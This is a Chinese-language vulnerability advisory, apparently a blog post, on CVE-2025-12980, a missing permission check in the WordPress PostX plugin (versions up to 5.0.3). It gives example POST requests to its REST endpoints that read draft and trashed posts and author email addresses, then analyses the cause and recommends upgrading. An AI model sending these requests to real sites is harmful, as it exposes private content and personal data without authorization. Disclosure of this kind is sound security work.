夜雨聆风
wordpress插件Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX 安全漏洞(CVE-2025-12980)
-
描述
Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX是WordPress 新闻杂志与博客解决方案
-
影响
Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX<=5.0.3
-
利用
当使用Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX 5.0.3版本插件时,/wp-json/ultp/、wp-json/ultp/v2/*等多个接口存在未做权限校验的情况,导致可未授权进行访问。
(1)
首先下载插件Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX 5.0.3,
地址:
https://downloads.wordpress.org/plugin/ultimate-post.5.0.3.zip
(2)安装完插件Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX之后,直接访问接口,如:
A. http://test1.wp.com/wp-json/ultp/ultp_search_data/
POST:
searchText=a&paged=1&postPerPage=10&image=1&category=1&author=1&date=1&excerpt=1
B. http://test2.wp.com/wp-json/ultp/v2/get_dynamic_content
POST:
post_id=1&key=title&data_type=post_info (获取标题,即便文章在草稿或者回收站)
post_id=1&key=excerpt&data_type=post_info (获取内容, 即便文章在草稿或者回收站)
post_id=1&key=user_email&data_type=author_info(获取作者邮箱)
post_id=1&key=display_name&data_type=author_info(获取作者名)
文章在草稿箱时的读取:
-
分析
在代码ultimate-post\addons\dynamic_content\includes\DCController.php,约30-56行:
直接使用‘permission_callback’ => ‘__return_true’,,而未对权限进行校验;同样情况还存在ultimate-post\classes\REST_API.php约107-117行:
-
修复
目前,Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX已经发布了升级版本5.0.6,建议用户及时确认是否受到漏洞影响,尽快采取修补措施。官方链接如下:
https://wordpress.org/plugins/ultimate-post/
修复建议:及时更新插件最新版本
